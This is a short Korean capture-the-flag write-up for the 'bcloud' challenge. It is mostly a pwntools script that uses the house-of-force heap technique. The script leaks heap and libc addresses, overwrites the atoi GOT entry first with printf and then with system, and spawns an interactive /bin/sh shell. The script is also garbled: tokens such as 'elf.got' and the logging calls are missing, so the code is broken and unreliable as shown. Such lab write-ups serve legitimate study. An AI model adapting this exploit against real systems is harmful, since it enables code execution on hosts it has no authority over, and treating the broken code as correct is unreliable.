house of force로 푸는 문제다.
풀다가 이상하게 익스가 안되길래 다른분의 코드를 참고했다.
exploit code
from pwn import * r = process("./bcloud") elf = ELF("./bcloud") print r.recv() r.send("A"*64) r.recvuntil("A"*64) chunk = u32(r.recv(4)) printf_plt = elf.plt['printf'] atoi_got =['atoi'] topchunk = chunk + 0xd8 house = atoi_got - topchunk - 8 - 4"exit_got = {}".format(hex(atoi_got)))"TOP chunk = {}".format(hex(topchunk)))"house of force = {}".format(hex(house))) r.recvuntil("Now let's set synchronization options.") print r.recvuntil("Org:") r.send("B"*64) print r.recvuntil("Host:") r.sendline(p32(0xffffffff)*2) r.recvuntil(">>") r.sendline("1") print r.recvuntil("Input the length of the note content:") r.sendline(str(house)) print r.recvuntil(">>") r.sendline("1") print r.recvuntil("Input the length of the note content:") r.sendline("8") print r.recvuntil("Input the content:") r.sendline("AAAA"+p32(printf_plt)) print r.recv(1024) r.sendline("%p "*20) print r.recvuntil("0x10 0xa ") leaked_addr = int(r.recv(10), 16) print hex(leaked_addr) libc_base = leaked_addr - 0x49670 system = libc_base + 0x3ada0"libc_base = {}".format(hex(libc_base)))"system = {}".format(hex(system))) print r.recvuntil(">>") r.sendline("333") print r.recvuntil("id:") r.sendline("1") print r.recvuntil("content:") r.send("AAAA"+p32(system)) print r.recv() r.sendline("/bin/sh\x00") r.interactive()
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